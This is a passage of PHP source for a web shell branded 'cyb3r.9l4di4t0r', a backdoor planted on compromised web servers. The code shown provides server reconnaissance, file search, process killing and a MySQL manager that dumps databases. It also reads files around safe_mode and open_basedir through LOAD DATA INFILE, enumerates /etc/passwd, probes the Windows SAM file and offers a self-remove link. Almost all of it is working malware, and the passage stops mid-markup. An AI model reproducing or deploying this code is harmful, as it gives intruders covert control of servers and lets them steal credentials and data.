"w"); + + if (!$fp) {$ret["err"][] = 2;} + + else + + { + + fwrite ($fp, $out); + + fclose ($fp); + + } + + } + + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + + return $out; + +} + +} + +if (!function_exists("mysql_buildwhere")) + +{ + +function mysql_buildwhere($array,$sep=" and",$functs=array()) + +{ + + if (!is_array($array)) {$array = array();} + + $result = ""; + + foreach($array as $k=>$v) + + { + + $value = ""; + + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + + $value .= "'".addslashes($v)."'"; + + if (!empty($functs[$k])) {$value .= ")";} + + $result .= "`".$k."` = ".$value.$sep; + + } + + $result = substr($result,0,strlen($result)-strlen($sep)); + + return $result; + +} + +} + +if (!function_exists("mysql_fetch_all")) + +{ + +function mysql_fetch_all($query,$sock) + +{ + + if ($sock) {$result = mysql_query($query,$sock);} + + else {$result = mysql_query($query);} + + $array = array(); + + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + + mysql_free_result($result); + + return $array; + +} + +} + +if (!function_exists("mysql_smarterror")) + +{ + +function mysql_smarterror($type,$sock) + +{ + + if ($sock) {$error = mysql_error($sock);} + + else {$error = mysql_error();} + + $error = htmlspecialchars($error); + + return $error; + +} + +} + +if (!function_exists("mysql_query_form")) + +{ + +function mysql_query_form() + +{ + + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";} + + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + + if ((!$submit) or ($sql_act)) + + { + + echo ""; + + if ($tbl_struct) + + { + + echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



 
Fields:
"; + + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
";} + + echo "
"; + + } + + } + + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} + +} + +} + +if (!function_exists("mysql_create_db")) + +{ + +function mysql_create_db($db,$sock="") + +{ + + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + + if ($sock) {return mysql_query($sql,$sock);} + + else {return mysql_query($sql);} + +} + +} + +if (!function_exists("mysql_query_parse")) + +{ + +function mysql_query_parse($query) + +{ + + $query = trim($query); + + $arr = explode (" ",$query); + + /*array array() + + { + + "METHOD"=>array(output_type), + + "METHOD1"... + + ... + + } + + if output_type == 0, no output, + + if output_type == 1, no output if no error + + if output_type == 2, output without control-buttons + + if output_type == 3, output with control-buttons + + */ + + $types = array( + + "SELECT"=>array(3,1), + + "SHOW"=>array(2,1), + + "DELETE"=>array(1), + + "DROP"=>array(1) + + ); + + $result = array(); + + $op = strtoupper($arr[0]); + + if (is_array($types[$op])) + + { + + $result["propertions"] = $types[$op]; + + $result["query"] = $query; + + if ($types[$op] == 2) + + { + + foreach($arr as $k=>$v) + + { + + if (strtoupper($v) == "LIMIT") + + { + + $result["limit"] = $arr[$k+1]; + + $result["limit"] = explode(",",$result["limit"]); + + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + + unset($arr[$k],$arr[$k+1]); + + } + + } + + } + + } + + else {return FALSE;} + +} + +} + +if (!function_exists("cyb3rfsearch")) + +{ + +function cyb3rfsearch($d) + +{ + + global $found; + + global $found_d; + + global $found_f; + + global $search_i_f; + + global $search_i_d; + + global $a; + + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + + $h = opendir($d); + + while (($f = readdir($h)) !== FALSE) + + { + + if($f != "." && $f != "..") + + { + + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + + if (is_dir($d.$f)) + + { + + $search_i_d++; + + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + + if (!is_link($d.$f)) {cyb3rfsearch($d.$f);} + + } + + else + + { + + $search_i_f++; + + if ($bool) + + { + + if (!empty($a["text"])) + + { + + $r = @file_get_contents($d.$f); + + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + + else {$bool = strpos(" ".$r,$a["text"],1);} + + if ($a["text_not"]) {$bool = !$bool;} + + if ($bool) {$found[] = $d.$f; $found_f++;} + + } + + else {$found[] = $d.$f; $found_f++;} + + } + + } + + } + + } + + closedir($h); + +} + +} + +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} + +//Sending headers + +@ob_start(); + +@ob_implicit_flush(0); + +function onphpshutdown() + +{ + + global $gzipencode,$ft; + + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + + { + + $v = @ob_get_contents(); + + @ob_end_clean(); + + @ob_start("ob_gzHandler"); + + echo $v; + + @ob_end_flush(); + + } + +} + +function cyb3rexit() + +{ + + onphpshutdown(); + + exit; + +} + + +if (empty($tmpdir)) + +{ + + $tmpdir = ini_get("upload_tmp_dir"); + + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} + +} + +$tmpdir = realpath($tmpdir); + +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); + +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} + +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} + +else {$tmpdir_logs = realpath($tmpdir_logs);} + +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + +{ + + $safemode = TRUE; + + $hsafemode = "ON (secure)"; + $sfmode = "ON (secure)"; +} + +else {$safemode = FALSE; $hsafemode = "OFF (not secure)"; $sfmode = "OFF (not secure)";} + +$v = @ini_get("open_basedir"); + +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} + +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} + +$sort = htmlspecialchars($sort); + +if (empty($sort)) {$sort = $sort_default;} + +$sort[1] = strtolower($sort[1]); + +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); + +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[Google]',htmlspecialchars($DISP_SERVER_SOFTWARE)); + +@ini_set("highlight.bg",$highlight_bg); //FFFFFF + +@ini_set("highlight.comment",$highlight_comment); //#FF8000 + +@ini_set("highlight.default",$highlight_default); //#0000BB + +@ini_set("highlight.html",$highlight_html); //#000000 + +@ini_set("highlight.keyword",$highlight_keyword); //#007700 + +@ini_set("highlight.string",$highlight_string); //#DD0000 + +if (!is_array($actbox)) {$actbox = array();} + +$dspact = $act = htmlspecialchars($act); + +$disp_fullpath = $ls_arr = $notls = null; + +$ud = urlencode($d); + +?> + +
+ + + + + + +


cyb3r.9l4di4t0r

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Software :Exploit DB]'; ?>Server I.P."?>
Uname-a :"?>",1); ?>Client I.P."?>
Username :"?>",1);} else {echo get_current_user();} ?>Systeminfo"?>
Safe Mode :
Directory : + ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + + $i++; + +} + +echo "   "; + +if (is_writable($d)) + +{ + + $wd = TRUE; + + $wdt = "[ ok ]"; + + echo "".view_perms(fileperms($d)).""; + +} + +else + +{ + + $wd = FALSE; + + $wdt = "[ Read-Only ]"; + + echo "".view_perms_color($d).""; + +} + ?> + Self Remove"?>
Free Space : + ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; + +}?> + Feedback"?>
Drives : + [ "; + + if ($letter.":" != $v) {$letters .= $letter;} + + else {$letters .= "".$letter."";} + + $letters .= " ] "; + + } + + } + + if (!empty($letters)) {echo $letters."
";} +} + ?>
I'm Out !
+
+ + + +
+ ADMIN: | + PHP : ".$phpVersion.""?> | + Curl : Enabled"):("Disabled"); ?> | + Oracle : Enabled"):("Disabled"); ?> | + MySQL : Enabled"):("Disabled");?> | + MSSQL : Enabled"):("Disabled"); ?> | + PostgreSQL : Enabled"):("Disabled"); ?> | + Disable functions : +
+ + + + +
+ 0) + + { + + foreach($quicklaunch as $item) + + { + + $item[1] = str_replace("%d",urlencode($d),$item[1]); + + $item[1] = str_replace("%sort",$sort,$item[1]); + + $v = realpath($d.".."); + + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + + echo "".$item[0]."    "; + + } + + }?> +

+".$donated_html."
";} + +echo ""; + + $line = explode(" ",$line); + + $line[10] = join(" ",array_slice($line,10)); + + $line = array_slice($line,0,11); + + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + + $line[] = "KILL"; + + $prcs[] = $line; + + echo ""; + + } + + } + + } + + else + + { + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + + $ret = convert_cyr_string($ret,"d","w"); + + $stack = explode("\n",$ret); + + unset($stack[0],$stack[2]); + + $stack = array_values($stack); + + $head = explode("",$stack[0]); + + $head[1] = explode(" ",$head[1]); + + $head[1] = $head[1][0]; + + $stack = array_slice($stack,1); + + unset($head[2]); + + $head = array_values($head); + + if ($parsesort[1] != "a") {$y = "";} + + else {$y = "";} + + if ($k > count($head)) {$k = count($head)-1;} + + for($i=0;$i".trim($head[$i])."";} + + } + + $prcs = array(); + + foreach ($stack as $line) + + { + + if (!empty($line)) + + { + + echo ""; + + $line = explode("",$line); + + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + + $prcs[] = $line; + + echo ""; + + } + + } + + } + + $head[$k] = "".$head[$k]."".$y; + + $v = $processes_sort[0]; + + usort($prcs,"tabsort"); + + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + + $tab = array(); + + $tab[] = $head; + + $tab = array_merge($tab,$prcs); + + echo "
"; + +if ($act == "") {$act = $dspact = "ls";} + +if ($act == "sql") + +{ + + $sql_surl = $surl."act=sql"; + + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + + $sql_surl .= "&"; + + ?>

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

+ "; + + if (!$sql_sock) {?> + "; + + } + + echo "
SQL Manager:
"; + + if (!$sql_sock) + + { + + if (!$sql_server) {echo "NO CONNECTION";} + + else {echo "
Can't connect
"; echo "".$err."";} + + } + + else + + { + + $sqlquicklaunch = array(); + + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + + echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + + echo "
"; + + } + + echo "
i
+
  • If login is null, login is owner of process.
  • + If host is null, host is localhost
  • If port is null, port is 3306 (default)
  • +
     Please, fill the form:
    UsernamePassword Database 
    HostPORT
    +
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + + $c = 0; + + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + + if (!$c) {echo "No tables found in database.";} + + } + + } + + else + + { + + ?>
    Home

    Please, select database
    "; + + //Start center panel + + $diplay = TRUE; + + if ($sql_db) + + { + + if (!is_numeric($c)) {$c = 0;} + + if ($c == 0) {$c = "no";} + + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + + echo "
    "; + + $acts = array("","dump"); + + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + + elseif ($sql_tbl_act == "insert") + + { + + if ($sql_tbl_insert_radio == 1) + + { + + $keys = ""; + + $akeys = array_keys($sql_tbl_insert); + + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + + $values = ""; + + $i = 0; + + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + + $sql_act = "query"; + + $sql_tbl_act = "browse"; + + } + + elseif ($sql_tbl_insert_radio == 2) + + { + + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + + $result = mysql_query($sql_query) or print(mysql_smarterror()); + + $result = mysql_fetch_array($result, MYSQL_ASSOC); + + $sql_act = "query"; + + $sql_tbl_act = "browse"; + + } + + } + + if ($sql_act == "query") + + { + + echo "
    "; + + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + + } + + if (in_array($sql_act,$acts)) + + { + + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + + if ($sql_act == "newtbl") + + { + + echo ""; + + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + + } + + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + + } + + elseif ($sql_act == "dump") + + { + + if (empty($submit)) + + { + + $diplay = FALSE; + + echo "
    SQL-Dump:

    "; + + echo "DB: 

    "; + + $v = join (";",$dmptbls); + + echo "Only tables (explode \";\") 1: 

    "; + + if ($dump_file) {$tmp = $dump_file;} + + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + + echo "File: 

    "; + + echo "Download:  

    "; + + echo "Save to file:  "; + + echo "



    1 - all, if empty"; + + echo "
    "; + + } + + else + + { + + $diplay = TRUE; + + $set = array(); + + $set["sock"] = $sql_sock; + + $set["db"] = $sql_db; + + $dump_out = "download"; + + $set["print"] = 0; + + $set["nl2br"] = 0; + + $set[""] = 0; + + $set["file"] = $dump_file; + + $set["add_drop"] = TRUE; + + $set["onlytabs"] = array(); + + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + + $ret = mysql_dump($set); + + if ($sql_dump_download) + + { + + @ob_clean(); + + header("Content-type: application/octet-stream"); + + header("Content-length: ".strlen($ret)); + + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + + echo $ret; + + exit; + + } + + elseif ($sql_dump_savetofile) + + { + + $fp = fopen($sql_dump_file,"w"); + + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + + else + + { + + fwrite($fp,$ret); + + fclose($fp); + + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + + } + + } + + else {echo "Dump: nothing to do!";} + + } + + } + + if ($diplay) + + { + + if (!empty($sql_tbl)) + + { + + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + + $count_row = mysql_fetch_array($count); + + mysql_free_result($count); + + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + + $tbl_struct_fields = array(); + + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + + $perpage = $sql_tbl_le - $sql_tbl_ls; + + if (!is_numeric($perpage)) {$perpage = 10;} + + $numpages = $count_row[0]/$perpage; + + $e = explode(" ",$sql_order); + + if (count($e) == 2) + + { + + if ($e[0] == "d") {$asc_desc = "DESC";} + + else {$asc_desc = "ASC";} + + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + + } + + else {$v = "";} + + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + + $result = mysql_query($query) or print(mysql_smarterror()); + + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + + echo "Structure ]   "; + + echo "Browse ]   "; + + echo "Dump ]   "; + + echo "Insert ]   "; + + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + + if ($sql_tbl_act == "insert") + + { + + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + + if (!empty($sql_tbl_insert_radio)) + + { + + + + } + + else + + { + + echo "

    Inserting row into table:
    "; + + if (!empty($sql_tbl_insert_q)) + + { + + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + + $sql_query .= " WHERE".$sql_tbl_insert_q; + + $sql_query .= " LIMIT 1;"; + + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + + $values = mysql_fetch_assoc($result); + + mysql_free_result($result); + + } + + else {$values = array();} + + echo "
    "; + + foreach ($tbl_struct_fields as $field) + + { + + $name = $field["Field"]; + + if (empty($sql_tbl_insert_q)) {$v = "";} + + echo ""; + + $i++; + + } + + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + + echo "Insert as new row"; + + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + + echo "

    "; + + } + + } + + if ($sql_tbl_act == "browse") + + { + + $sql_tbl_ls = abs($sql_tbl_ls); + + $sql_tbl_le = abs($sql_tbl_le); + + echo "
    "; + + echo "\"Pages\" "; + + $b = 0; + + for($i=0;$i<$numpages;$i++) + + { + + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + + echo $i; + + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + + else {echo " ";} + + } + + if ($i == 0) {echo "empty";} + + echo "
    From:  To:  
    "; + + echo "
    "; + + echo ""; + + echo ""; + + for ($i=0;$i"; + + if (empty($e[0])) {$e[0] = "a";} + + if ($e[1] != $v) {echo "".$v."";} + + else {echo "".$v."\"".$m."\"";} + + echo ""; + + } + + echo ""; + + echo ""; + + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + + { + + echo ""; + + $w = ""; + + $i = 0; + + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + + echo ""; + + $i = 0; + + foreach ($row as $k=>$v) + + { + + $v = htmlspecialchars($v); + + if ($v == "") {$v = "NULL";} + + echo ""; + + $i++; + + } + + echo ""; + + echo ""; + + } + + mysql_free_result($result); + + echo "
    Action
    ".$v.""; + + echo "\"Delete\" "; + + echo "\"Edit\" "; + + echo "

     

    "; + + } + + } + + else + + { + + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + + if (!$result) {echo mysql_smarterror();} + + else + + { + + echo "
    "; + + + + $i = 0; + + $tsize = $trows = 0; + + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + + { + + $tsize += $row["Data_length"]; + + $trows += $row["Rows"]; + + $size = view_size($row["Data_length"]); + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + $i++; + + } + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo ""; + + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + + mysql_free_result($result); + + } + + } + + } + + } + + } + + else + + { + + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + + if ($sql_act == "newdb") + + { + + echo ""; + + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + + } + + if ($sql_act == "serverstatus") + + { + + $result = mysql_query("SHOW STATUS", $sql_sock); + + echo "
    Server-status variables:

    "; + + echo ""; + + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + + mysql_free_result($result); + + } + + if ($sql_act == "servervars") + + { + + $result = mysql_query("SHOW VARIABLES", $sql_sock); + + echo "
    Server variables:

    "; + + echo ""; + + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + + mysql_free_result($result); + + } + + if ($sql_act == "processes") + + { + + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + + echo "
    Processes:

    "; + + echo ""; + + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + + mysql_free_result($result); + + } + + if ($sql_act == "getfile") + + { + + $tmpdb = $sql_login."_tmpdb"; + + $select = mysql_select_db($tmpdb); + + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + + if ($select) + + { + + $created = FALSE; + + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + + $result = mysql_query("SELECT * FROM tmp_file;"); + + if (!$result) {echo "Error in reading file (permision denied)!";} + + else + + { + + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + + mysql_free_result($result); + + mysql_query("DROP TABLE tmp_file;"); + + } + + } + + mysql_drop_db($tmpdb); //comment it if you want to leave database + + } + + } + + } + + } + + echo "
    "; + + if ($sql_sock) + + { + + $affected = @mysql_affected_rows($sql_sock); + + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + + echo "
    Affected rows: ".$affected."
    "; + +} + +if ($act == "mkdir") +{ + + if ($mkdir != $d) + { + + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + + echo "

    "; + + } + + $act = $dspact = "ls"; + +} + +if ($act == "d") + +{ + + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + + else + + { + + echo "Directory information:"; + + if (!$win) + + { + + echo "
    Owner/Group "; + + $ow = posix_getpwuid(fileowner($d)); + + $gr = posix_getgrgid(filegroup($d)); + + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + + } + + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + + } + +} + + +if ($act == "security") +{ + + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + + if (!$win) + + { + + if ($nixpasswd) + + { + + if ($nixpasswd == 1) {$nixpasswd = 0;} + + echo "*nix /etc/passwd:
    "; + + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + + echo "
    From:  To:  

    "; + + $i = $nixpwd_s; + + while ($i < $nixpwd_e) + + { + + $uid = posix_getpwuid($i); + + if ($uid) + + { + + $uid["dir"] = "".$uid["dir"].""; + + echo join(":",$uid)."
    "; + + } + + $i++; + + } + + } + + else {echo "
    Get /etc/passwd
    ";} + + } + + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
